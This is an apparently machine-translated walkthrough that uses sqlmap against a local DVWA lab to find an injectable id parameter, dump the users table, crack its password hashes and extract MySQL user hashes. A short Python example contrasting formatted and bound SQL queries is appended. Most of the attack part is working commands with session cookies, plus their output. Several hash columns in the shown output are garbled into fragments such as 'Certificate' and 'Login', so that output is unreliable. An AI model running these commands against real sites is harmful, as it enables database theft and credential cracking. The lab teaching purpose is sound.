Use DVWA + sqlmap to experience SQL Injection

Source: Internet
Author: User

DVWA (Damn Vulnerable Web Application) is a set of web vulnerability test programs written in PHP + MySQL for teaching and detecting conventional web vulnerabilities. It includes SQL injection, XSS, blind injection and other common security vulnerabilities.

sqlmap is an automated SQL injection tool. Its main function is to scan for, discover and exploit the SQL injection vulnerabilities of a given URL. It supports many databases.

So, with a spear and a shield in hand, let's get a feel for SQL injection.

Installing DVWA is not covered in detail here; it can be found on GitHub and needs PHP/Apache/MySQL. sqlmap is open source, can also be found on GitHub, and does not need to be installed.

The steps are as follows.

1. Search for injection points

1. Start Wireshark and capture on the lo interface (because everything runs on the local machine).

2. On the SQL Injection page of DVWA there is a user ID input box. Enter any value and click Submit.

3. In Wireshark, find the GET request, including the Request URI and the Cookie.

4. Use sqlmap to find injection points:

    ./sqlmap.py -u "http://localhost/DVWA-1.0.8/vulnerabilities/sqli/?id=2&Submit=Submit" --cookie="security=low; bd1__firstime=1407830747693; PHPSESSID=q1le5upd7bofsg2c0lbdh839f3"

   The possible injection point is id, and the database is MySQL:

    [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
    [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable

2. Dump the database

1. Get the current database name:

    ./sqlmap.py -u "http://localhost/DVWA-1.0.8/vulnerabilities/sqli/?id=2&Submit=Submit" --cookie="security=low; bd1__firstime=1407830747693; PHPSESSID=q1le5upd7bofsg2c0lbdh839f3" --current-db

   The current database is 'dvwa'.

2. Use the dvwa database to obtain the table names:

    ./sqlmap.py -u "http://localhost/DVWA-1.0.8/vulnerabilities/sqli/?id=2&Submit=Submit" --cookie="security=low; bd1__firstime=1407830747693; PHPSESSID=q1le5upd7bofsg2c0lbdh839f3" --current-db --tables -D dvwa

    Database: dvwa
    [2 tables]
    +-----------+
    | guestbook |
    | users     |
    +-----------+

3. Get the guestbook table structure:

    ./sqlmap.py -u "http://localhost/DVWA-1.0.8/vulnerabilities/sqli/?id=2&Submit=Submit" --cookie="security=low; bd1__firstime=1407830747693; PHPSESSID=q1le5upd7bofsg2c0lbdh839f3" -T guestbook --columns

    Database: dvwa
    Table: guestbook
    [3 columns]
    +------------+----------------------+
    | Column     | Type                 |
    +------------+----------------------+
    | comment    | varchar(300)         |
    | comment_id | smallint(5) unsigned |
    | name       | varchar(100)         |
    +------------+----------------------+

   Obtain the users table structure:

    Database: dvwa
    Table: users
    [6 columns]
    +------------+-------------+
    | Column     | Type        |
    +------------+-------------+
    | user       | varchar(15) |
    | avatar     | varchar(70) |
    | first_name | varchar(15) |
    | last_name  | varchar(15) |
    | password   | varchar(32) |
    | user_id    | int(6)      |
    +------------+-------------+

4. Get the content of the users table:

    ./sqlmap.py -u "http://localhost/DVWA-1.0.8/vulnerabilities/sqli/?id=2&Submit=Submit" --cookie="security=low; bd1__firstime=1407830747693; PHPSESSID=q1le5upd7bofsg2c0lbdh839f3" -T users --dump

    Database: dvwa
    Table: users
    [5 entries]
    | user_id | user    | avatar                          | password                   | last_name | first_name |
    | 1       | admin   | dvwa/hackable/users/admin.jpg   | admin |
    | 2       | gordonb | dvwa/hackable/users/gordonb.jpg | required                   | Brown     | Gordon     |
    | 3       | 1337    | dvwa/hackable/users/1337.jpg    | small                      | Me        | Hack       |
    | 4       | pablo   | dvwa/hackable/users/pablo.jpg   | 0d1_d09f5bbe40 Certificate | Picasso   | Pablo      |
    | 5       | smithy  | dvwa/hackable/users/smithy.jpg  | medium                     | Smith     | Bob        |

5. Run the same command as in step 4. When sqlmap asks whether to crack the passwords, choose yes. sqlmap uses its own dictionary to crack the passwords and obtains the passwords of the five users:

    Database: dvwa
    Table: users
    [5 entries]
    | user_id | user    | avatar                          | password                                    | last_name | first_name |
    | 1       | admin   | dvwa/hackable/users/admin.jpg   | 5f Login (password)                         | admin |
    | 2       | gordonb | dvwa/hackable/users/gordonb.jpg | e99a18c428cb38d5f260853678922e03 (abc123)   | Brown     | Gordon     |
    | 3       | 1337    | dvwa/hackable/users/1337.jpg    | 8d3533d75ae2c3966d7e0d4fcc69216b (charley)  | Me        | Hack       |
    | 4       | pablo   | dvwa/hackable/users/pablo.jpg   | small (letmein)                             | Picasso   | Pablo      |
    | 5       | smithy  | dvwa/hackable/users/smithy.jpg  | password                                    | Smith     | Bob        |

6. At this point, the SQL injection task of DVWA is complete.

The same applies to the SQL blind injection task of DVWA. When first looking for the injection point, sqlmap reports that id is a blind injection point:

    ./sqlmap.py -u "http://localhost/DVWA-1.0.8/vulnerabilities/sqli_blind/?id=1&Submit=Submit" --cookie="security=low; bd1__firstime=1407830747693; PHPSESSID=q1le5upd7bofsg2c0lbdh839f3"

The output shows that id is injectable with 'AND boolean-based blind - WHERE or HAVING clause':

    [INFO] GET parameter 'id' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="Surname: admin")

With --passwords, sqlmap uses its own dictionary to crack the passwords of the database users:

    ./sqlmap.py -u "http://localhost/DVWA-1.0.8/vulnerabilities/sqli/?id=2&Submit=Submit" --cookie="security=low; bd1__firstime=1407830747693; PHPSESSID=q1le5upd7bofsg2c0lbdh839f3" --passwords

    database management system users password hashes:
    [*] debian-sys-maint [1]:
        password hash: * users
    [*] root [1]:
        password hash: *3800D13EE725ED411CBC3F23B2A2E19C64CE0BEC
        clear-text password: passwordABC
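Why the id parameter is injectable, and what closes the hole, shown as an added example that is not DVWA's own code or part of the original article. It assumes a query built by string formatting, uses Python with an in-memory SQLite database as a stand-in for PHP + MySQL, and all function names and sample rows are hypothetical.

```python
import re
import sqlite3

# Constructed sample rows; column names follow the users table dumped above.
ROWS = [(1, "admin", "admin"), (2, "Gordon", "Brown"), (3, "Hack", "Me"),
        (4, "Pablo", "Picasso"), (5, "Bob", "Smith")]

# Constructed input: a quote that closes the string literal, then a tautology.
TAUTOLOGY = "1' OR '1'='1"


def make_db():
    """In-memory stand-in for the dvwa database (SQLite here, not MySQL)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user_id INTEGER PRIMARY KEY,"
                 " first_name TEXT, last_name TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", ROWS)
    return conn


def lookup_vulnerable(conn, user_id):
    # The id parameter is pasted into the SQL text, so a quote in it changes
    # the structure of the statement. This is the flaw sqlmap detects.
    sql = ("SELECT first_name, last_name FROM users "
           "WHERE user_id = '%s'" % user_id)
    return conn.execute(sql).fetchall()


def lookup_bound(conn, user_id):
    # The statement text is fixed; the value travels separately as a bound
    # parameter and can only ever be compared as data.
    sql = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return conn.execute(sql, (user_id,)).fetchall()


def lookup_safe(conn, user_id):
    # Defence in depth: reject anything that is not a short decimal id,
    # then still bind the value instead of formatting it into the query.
    if not re.fullmatch(r"[0-9]{1,6}", user_id):
        raise ValueError("id must be 1 to 6 decimal digits")
    return lookup_bound(conn, int(user_id))


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", lookup_vulnerable(db, TAUTOLOGY))
    print("bound:     ", lookup_bound(db, TAUTOLOGY))
    print("safe:      ", lookup_safe(db, "2"))
```

With the formatted query the constructed input returns every row; with the bound parameter it matches nothing, which is the behaviour a rescan of the fixed endpoint should confirm.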
